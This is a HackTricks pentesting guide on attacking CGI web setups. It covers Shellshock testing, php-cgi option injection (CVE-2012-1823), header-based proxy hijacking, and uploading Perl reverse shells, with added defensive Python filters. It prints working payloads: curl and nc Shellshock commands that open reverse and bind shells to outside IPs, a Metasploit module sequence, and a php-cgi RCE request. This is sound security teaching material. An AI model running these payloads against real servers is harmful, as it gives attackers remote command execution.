hacktricks/network-services-pentesting/pentesting-web/cgi.md

<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or to download HackTricks as a PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and the [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

# Information

**CGI scripts are commonly Perl scripts**, so if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a Perl reverse shell** (`/usr/share/webshells/perl/perl-reverse-shell.pl`), **change the extension** from **.pl** to **.cgi**, give it **execute permissions** (`chmod +x`) and **access the reverse shell from the web browser** to execute it.
To test for **CGI vulnerabilities** it is recommended to use `nikto -C all` (and all the plugins).

# **ShellShock**

Bash can also be used to run commands passed to it by applications, and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes run on a computer. The vulnerability lies in the fact that **an attacker can attach malicious code to an environment variable, and that code runs as soon as the variable is received** (a vulnerable bash imports any variable whose value starts with a function definition, and executes whatever follows it).

When this vulnerability is exploited, **the page may throw an error**.

You can **discover** this vulnerability by noticing that the server is using an **old version of Apache** with **cgi_mod** (with a cgi folder) or by using **nikto**.

## **Testing**

Most of the tests are based on echoing something and expecting that string to be returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
**Nmap**
```bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```

## **Curl (reflected, blind and out-of-band)**

The three curl checks below differ only in how you observe the result of the injected command, which matters because a vulnerable CGI script does not always return the command's output.

### **Reflected**

The injected command writes a marker string, and the marker is searched for in the HTTP response. This is the simplest and most reliable check: if the marker comes back, the server executed the header value.

### **Blind**

When output is not returned in the response, the command is made to produce a measurable side effect instead, typically a delay (`sleep`) that shows up as response time. Compare against a baseline request first, since network latency alone can produce a false positive.

### **Out-of-Band**

When neither output nor timing can be observed, the command is made to open a connection to a host you control, and the check succeeds if that connection arrives. Any request header (`Cookie`, `Referer`, etc.) can carry the payload, because CGI exports every header into the environment of the script.

In all three cases the fix is the same: update bash to a version that no longer imports function definitions from arbitrary environment variables, and remove or restrict CGI scripts that are not needed.
```bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi

# Out-Of-Band: use Cookie as an alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
```
[**Shellsocker**](https://github.com/liamim/shellshocker)
```bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```

## Exploit

CGI (Common Gateway Interface) lets a web server execute a program and return its output as the response, so a vulnerability in a CGI script is usually a vulnerability in an unsandboxed process running as the web server user. The classes that come up most often:

### Remote Command Execution

The script passes user input to a shell or another program without validation, so an attacker-controlled value becomes part of a command. In the Shellshock case above the input is a request header rather than a form field, because CGI exports headers into the environment before the script even runs.

### File Inclusion

The script opens or includes a file whose path is built from user input. This can expose configuration files or credentials, or execute code if the included file is attacker-controlled.

### Directory Traversal

User input is joined to a base directory without canonicalisation, so `../` sequences escape the intended directory and reach files that should be restricted.

### Code Injection

User input is evaluated as code by the interpreter running the script (for example through `eval` in Perl), which gives the attacker the same capability as the script itself.

### Conclusion

All four classes share one root cause: untrusted input reaching an interpreter, a shell or the filesystem unchanged. Validate and canonicalise input, run CGI scripts with the least privilege the server can offer, and verify with regular security assessments and penetration testing.
```bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
```

# **Proxy (MitM to web server requests)**

CGI creates an environment variable for each header of the HTTP request. For example, the header "host: web.com" becomes "HTTP_HOST"="web.com".

Since the web server (or an HTTP client library it uses) may honour the HTTP_PROXY variable, try sending a header containing `Proxy: <IP_attacker>:<PORT>`. If the server performs any outbound request during the session, you will be able to capture each request it makes.
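To see exactly how a request header turns into an environment variable, and why a header named `Proxy` is a problem, here is an added Python model of the CGI name-mapping rule; it is not code from the page or from any web server. It applies the RFC 3875 rule (upper-case the name, map non-alphanumerics to `_`, prefix `HTTP_`) and then shows the defensive side: a filter that drops the request-derived variable that collides with the name HTTP client libraries read for proxy configuration. The sample headers and the `203.0.113.7` address are constructed.

```python
import re
from typing import Dict, Tuple

# Environment names HTTP client libraries consult for an outbound proxy. Because CGI
# prefixes every request header with HTTP_, a header called "Proxy" lands exactly on
# HTTP_PROXY; the other conventional names (HTTPS_PROXY, ALL_PROXY) cannot be reached
# this way, so only HTTP_PROXY needs to be filtered.
PROXY_ENV_NAMES = {"HTTP_PROXY"}


def header_to_cgi_env(name: str) -> str:
    """RFC 3875 §4.1.18: upper-case the header name, map every non-alphanumeric
    character to '_', and prefix the result with HTTP_."""
    return "HTTP_" + re.sub(r"[^A-Z0-9]", "_", name.upper())


def build_cgi_env(headers: Dict[str, str]) -> Dict[str, str]:
    """Environment a CGI-style server hands to the script for these request headers."""
    return {header_to_cgi_env(k): v for k, v in headers.items()}


def build_safe_cgi_env(headers: Dict[str, str]) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Same mapping, but request-derived variables that collide with proxy settings are
    removed so a client library inside the script cannot be redirected by the caller.
    Returns (environment, dropped) so the drop can be logged."""
    env = build_cgi_env(headers)
    dropped = {k: env.pop(k) for k in list(env) if k in PROXY_ENV_NAMES}
    return env, dropped


def outbound_proxy_for(env: Dict[str, str]) -> str:
    """Mimic the lookup a client library performs before an outbound request
    (empty string means a direct connection)."""
    return env.get("HTTP_PROXY", "")


if __name__ == "__main__":
    # Constructed request: a normal Host header plus an attacker-style Proxy header.
    request_headers = {"Host": "web.com", "User-Agent": "x", "Proxy": "203.0.113.7:8080"}
    env = build_cgi_env(request_headers)
    print("unfiltered proxy:", outbound_proxy_for(env) or "(direct)")
    safe_env, dropped = build_safe_cgi_env(request_headers)
    print("filtered proxy:", outbound_proxy_for(safe_env) or "(direct)", "dropped:", dropped)
```

The same filter can be applied on the server side (most web servers gained an option or rule to drop the `Proxy` header) or on the application side by ignoring `HTTP_PROXY` whenever the process is handling a request.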

# Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Basically, if CGI is active and PHP is "old" (< 5.3.12 / < 5.4.2), you can execute code.
To exploit this vulnerability you need to access some PHP file of the web server without sending parameters (in particular, without sending the character "="): a query string that contains no "=" is passed to the CGI binary as command-line arguments, and php-cgi parsed those as its own options.
Then, to test this vulnerability, you can access for example `/index.php?-s` (note the `-s`) and the **source code of the application will appear in the response**.

Then, to obtain **RCE**, you can send this special query: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` and the **PHP code to execute in the body of the request**. Example:
2020-08-06 14:25:29 +00:00
```bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
```
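Why the "=" matters: RFC 3875 §4.4 says that when the query string contains no unencoded "=", the server URL-decodes it, splits it on "+" and passes the pieces to the CGI program as command-line arguments, and old php-cgi then treated them as its own options. The Python below is an added model of that argument construction (not the page's or PHP's code), together with the check a web server or reverse proxy can apply to refuse such requests; the example query strings are the ones used in this section.

```python
from typing import List
from urllib.parse import unquote


def cgi_argv_from_query(query_string: str) -> List[str]:
    """Arguments a CGI server passes on the command line for a given QUERY_STRING.

    RFC 3875 §4.4: only when the query string has no unencoded '=' is it treated as an
    "indexed" query and turned into arguments (split on '+', each piece URL-decoded).
    Note that '%3d' is decoded only after the '=' test, which is exactly what the
    auto_prepend_file query relies on.
    """
    if query_string == "" or "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+") if part]


def is_option_injection(query_string: str) -> bool:
    """True when the indexed query would hand the interpreter something that looks like
    one of its own options. Refusing such requests at the server (the workaround
    published at the time was a mod_rewrite rule with the same logic) blocks the
    attack without an immediate upgrade."""
    return any(arg.startswith("-") for arg in cgi_argv_from_query(query_string))


if __name__ == "__main__":
    samples = ["-s", "-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", "id=5", "page+about", ""]
    for qs in samples:
        verdict = "blocked" if is_option_injection(qs) else "allowed"
        print(f"{qs!r:70} -> {cgi_argv_from_query(qs)} {verdict}")
```

`page+about` is the legitimate use of indexed queries (ISINDEX-style searches), which is why the check keys on a leading dash rather than on the absence of "=" alone.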

**More information about the vulnerability and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/), [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823), [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311), [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**